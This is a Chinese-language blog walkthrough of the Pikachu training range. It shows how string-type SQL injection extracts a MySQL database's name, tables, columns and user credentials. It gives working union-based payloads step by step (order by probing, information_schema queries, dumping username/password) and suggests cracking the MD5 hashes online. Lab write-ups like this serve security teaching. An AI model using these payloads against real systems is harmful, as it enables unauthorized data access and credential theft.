pikachu如何利用字符型SQL注入拿下数据库

最新推荐文章于 2024-05-19 11:10:32 发布
最新推荐文章于 2024-05-19 11:10:32 发布
阅读量853 收藏 3
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61903602/article/details/127590362
版权

目录 

 前言

  • 一、了解SQL查询语句
  • 二、解题思路
  • 三、操作步骤
    • 1.用order by获取主查询的字段数
    • 2.获取数据库名
    • 3.获取表名
    • 4.获取列名
    • 5.获取内容
  • 总结

前言

前面我们利用语句:a' or 1=1#  获取了其他用户的邮箱信息,接下来我们用联合查询拿下数据库

一、了解SQL查询语句

数据库是通过许多表来存放数据的,一个个表相互嵌套构成了数据库,类似文件夹。如图:

 SQL查询一般语法是:select 字段 from 表名 where...

 例如我们查询student表中age=7的学生的名字和年级:

select name,grade from student where age=7

 会得到:

 再如查询小刚的年级: select grade from School.student where name='小刚’

联合查询语句:select 字段 from 表名 where ... union select 字段 from 表名 where ...     

注意:联合查询的字段数和主字段数要一致。

SQL注入就是构造合法语句拼接到数据库SQL主语句中让其被执行。

二、解题思路

用order by获取主查询的字段数--->获取数据库名--->获取表名--->获取字段名--->查询字段内容

order by 字段1: 意思是根据字段1进行排序。如果没有这个字段会报错,根据这个可以知道主查询字段数,这样才能利用联合查询获取其他信息。(要用二分法多试几次)

获取数据库名用:database() 这个函数,查询版本用:version() 

在mysql中,自带的information_schema这个数据库里面存放了大量的重要信息。information_shcema存放了tables表、columns表等。

tables表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。(schema的中文意思是模式,在MySQL里可以理解为数据库)

columns表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。(column的中文意思是:列,专栏)

三、操作步骤

1.用order by获取主查询的字段数

输入:

a' order by 3 #

 (意思是:根据第3列排序)结果如下:

 说明该列不存在,那我们试输入:a' order by 2#    结果如下:

 两次结果不一样,可以知道主查询有两个字段。且我们可以猜测主查询SQL语句是:

select id,email from 某个表 where id='变量’

2.获取数据库名

输入:

a' union select database(),version()# 

  结果如下:

 可知:数据库名是pikachu ,版本是5.7.26

3.获取表名

输入:

a' union select table_schema,table_name from information_schema.tables where table_schema='pikachu'#

(意思是:使用联合查询,从information_schema.tables表里查询table_schema和table_name这两个字段的内容,过滤条件是table_schema='pikachu')结果如下:

 从结果我们可知:pikachu数据库里有 httpinfo、member、message、users、xssblind这五个表,且我们可以猜测管理员的账号密码可能放在users这个表里。

4.获取列名

输入:

a' union select table_name,column_name from information_schema.columns where table_name='users'#

结果如下:

 从结果我们可以看到有两个重要字段(列):username、password,即账号和密码

5.获取内容

从前面的操作中我们知道:在users表中有username,password这两个列,接下来我们只用从表中查询列的内容就行了。

输入:

a' union select username,password from users#

结果如下:

 得到了三个账号,而其密码作了加密处理。根据密文长度(有32位)可以推测是用了MD5加密算法进行了加密。我们可以直接百度搜索MD5解密,利用在线工具解密。以test的密文为例

 

 总结

本实验中,我们获取账号密码数据的过程可以看作找名字的过程,我们是先获取数据库的名字,接着在这个数据库里查询都有什么表,再查询敏感表里有什么敏感字段,最后再查询字段里的内容。

*冷血*
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
漏洞篇(SQL注入一)
m0_58001548的博客
03-26 1169
此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一个空用户,or 表示左右两边只要有一边条件判断成立则该语句返回结果为真,其中 1=1 永远为真,所以当前 SQL 语句无论怎么执行结果永远为真,--空格表示注释,注释后面所有代码不再执行。我们可以看到上面我们闭合的方法是没有输入用户名的,所以并不能成功登陆。
渗透测试-SQL注入之核心语法获取数据库信息
lza20001103的博客
04-18 6039
渗透测试-SQL注入之核心语法获取数据库信息
pikachu靶场(sql注入通关教程-上)
记录学习
05-19 793
pikachu靶场通关教程-上
pikachu字符注入注入意义)
white_or_abc的博客
12-21 524
首先打开pikachu,然后进入字符注入中,上面的问题是what’s your username?,判断此处命令的判断根据是id或者username,其实不重要,此处要猜测一下此处的语句就行,根据一个username判断内容的语句基本是 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 但是,在以前的写作业时,写上的答案是 kobe'and 1=1# $sql="SELECT * FROM users WHERE id='kobe'and 1
SQL注入——字符union注入
heyingcheng的博客
03-04 563
使用union注入拿到靶机中数据库里的所有用户名和密码查询语句:select 列名 from 表名 where 限定语句以sql-labs中的less-1为例。
SQL注入之获取数据库用户表数据
qq_59099375的博客
03-18 1261
SQL注入获取数据库数据
sql注入 pikachu post数字注入
08-12
SQL 注入 Pikachu Post 数字注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字注入方法,即使用 ...
pikachu靶场SQL注入.docx
09-13
Pikachu靶场SQL注入中,我们可以使用FireFox浏览器或BurpSuite工具来测试字符注入,通过测试,我们可以确定注入点。 Pikachu靶场SQL注入是非常危险的一种攻击手段,Web开发者应该采取措施来防止SQL注入攻击。
sql注入之数字注入
08-02
SQL 注入之数字注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字注入的概念、原理、检测方法和防御措施。 一、数字...
pikachu.rar
03-05
Pikachu:本地测试环境与SQL注入攻防详解》 "Pikachu.rar" 是一个专为Web安全攻防设计的压缩包文件,其主要内容是搭建一个详尽的漏洞平台,便于用户进行SQL注入测试以及靶场环境的构建。在这个环境中,我们可以...
pikachu靶场包含网络安全中常见的漏洞
11-08
pikachu靶场通关包含网络安全中常见的漏洞、XSS、SQL注入、目录遍历、文件上传、文件包含、远程执行等常见的漏洞都集成在此靶场的源码上!!
(学习笔记)SQL注入--基础篇
peanut5036的博客
02-16 1240
SQL注入自学笔记,适合小白,包括union注入,报错注入,与盲注
【无标题】SQL注入——MYSQL
m0_48222671的博客
04-21 2823
MYSQL注入一、SQL注入产生的条件二、判断注入点三、注入步骤1.猜解列名数量2.报错猜解3.查看当前数据库4.查看数据库名5.查看数据库表名6.查询admin列名7.查询user中的username 一、SQL注入产生的条件 可控变量 参数带入数据库查询 变量未经过过滤或过滤不严谨 二、判断注入点 下面的方法也知识可能存在,如果有404或者跳转,则没有注入 id=1 and 1=1 页面正常 id=1 and 1=1 页面错误 三、注入步骤 以判断存在注入 1.猜解列名数量 id=1 ord
SQL注入
m0_60651303的博客
07-13 436
select * from user where id=1 or 1=1 等价于 select * from user。网页发送请求给服务端。post:创建操作,参数不可以在URL里看到,不可以在浏览器输入该地址打开。get:查询操作,参数可以在URL里看到,可以直接在浏览器输入该地址打开。面试:手工注入sqlmap的区别,手工注入只是某一个注入点。需求1:拿到当前登录数据库的用户名,和当前数据库的名称。
SQL注入详解
读书 买花 长大
11-12 4193
SQL-sql
sql注入相关知识点
qq_22553739的博客
10-09 136
sql注入的相关知识点information_schema数据库SCHEMATA表TABLES表COLUMNS表MySQL查询语句在不知道任何条件时在知道一条已知条件时在知道两条已知条件时limit的用法database()函数version()函数user()函数 information_schema数据库 SCHEMATA表 SCHEMATA表存储该用户创建的所有数据库的库名,记录数据库库名的字段名为SCHEMA_NAME。 TABLES表 TABLES表存储该用户创建的所有数据库的库名和表名,记录数据
Mysql获取数据库所有表的名称
qq_42334297的博客
11-03 5709
Mysql数据库如何获取某数据库所有表名称(不包含表结构),Sql如下: SELECT table_name FROM information_schema.tables WHERE table_schema = 'xxx' AND table_type = 'base table' information_schema:Mysql自带的数据库,存放各类数据库相关信息的信息数据库,表多为视图 information_schema.tables:该数据库下的tables表 table_sche
sql注入详解
m0_67392811的博客
06-12 5748
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入-查表查列
soldi_er的博客
05-16 1725
文章目录概述系统数据库sys_4+3-ok系统数据库mysql系统数据库performance_schema参考 概述   Ciscn2021线上初赛的easy-sql中,过滤了information、sys、nno等关键字。 但是能够查询表名的数据库、表是值得收集的。   MySQL5.7中,有四个默认数据库,分别是information_schema库、sys库、mysql库、performance_schema库。   (1)information_schema自带数据库:可以查询表名和列名。   
pikachu sql数字注入
最新发布
06-21
Pikachu SQL数字注入通常指的是SQL注入攻击的一种形式,攻击者利用用户输入中包含的数字来进行恶意SQL查询。在Web应用程序中,如果对用户输入的数字字段没有进行充分的验证和过滤,就可能导致这种类注入攻击。 具体来说,攻击者可能会构造包含数字的SQL语句,意图影响数据库查询的结果。例如,他们可能尝试以下操作: 1. 提高或降低查询结果的数量限制(如 `LIMIT` 子句)。 2. 修改查询条件,使其执行非预期的操作,比如避开访问控制或获取敏感信息。 3. 利用数字执行数学运算,以达到绕过安全限制的目的。 防止数字SQL注入的方法包括: 1. 对用户输入进行严格的参数化查询或预编译语句处理,确保所有用户数据都作为参数传递,而不是直接拼接到SQL语句中。 2. 应用适当的输入验证,检查输入是否符合预期的数字格式。 3. 使用安全的编码技术,如使用`ADDQUOTES()`等函数对用户输入进行转义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值